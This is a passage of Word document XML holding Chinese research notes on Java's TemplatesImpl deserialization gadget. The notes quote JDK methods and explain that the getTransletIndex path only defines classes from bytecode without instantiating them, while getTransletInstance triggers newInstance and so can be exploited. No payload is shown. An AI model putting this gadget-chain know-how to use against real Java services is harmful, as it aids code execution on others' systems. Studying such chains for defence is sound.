      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="4EC9B0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>TransformerConfigurationException</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431E9CDE"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>        </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="6A9955"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>// Falls through</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0874C1F3"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02413DD4"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> _class;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEDAA7C"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B220EF"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A618AF"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p>
    <w:p w14:paraId="1A0DE3B1"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b/>
          <w:bCs/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>### getTransletIndex</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>链</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E4C948"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p>
    <w:p w14:paraId="610A89AC"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6796E6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> getTransletIndex() -&gt; defineTransletClasses()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C50865D"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>存在成员变量</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> private int _transletIndex = -1; </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>看起来可以调用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683F99CA"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p>
    <w:p w14:paraId="6AFBCBE6"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>```java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CA1783"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569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>synchronized</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="4EC9B0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>getTransletIndex</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF4D83A"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>try</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B180887"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>        </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> (_class == </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>) </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>defineTransletClasses</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440C0C9E"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4CE09E"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>catch</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> (</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="4EC9B0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>TransformerConfigurationException</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2951D15C"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>        </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="6A9955"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>// Falls through</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D98698"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0D5CB2"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> _transletIndex;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A9EC95"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE5FAC0"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D183CC"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p>
    <w:p w14:paraId="1BBA0041"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b/>
          <w:bCs/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>## </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>加载不起来的原因</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A87A9B"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p>
    <w:p w14:paraId="5F74609A"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CE9178"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>`defineTransletClasses();`</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>只是用来加载字节码为类，但是自身不会进行类的实例化，不会触发类的</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>和构造函数等操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAADB0D"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p>
    <w:p w14:paraId="4BA232CD"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>比对</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>getTransletInstance</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>之所以能成功利用的原因，是因为</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>getTransletInstance</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>代码进行了</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>`AbstractTranslet translet = (AbstractTranslet) _class[_transletIndex].newInstance();`</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>的操作，如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2883BB57"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p>
    <w:p w14:paraId="60B6BC6A"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>```java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D67171B"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569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="4EC9B0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>Translet</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>getTransletInstance</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EE5687"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>    throws TransformerConfigurationException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107A4C37"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>try</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECAA549"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>        </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> (_name == </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>) </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F33AA0C"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p>
    <w:p w14:paraId="7C0F87F7"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>        </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> (_class == </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
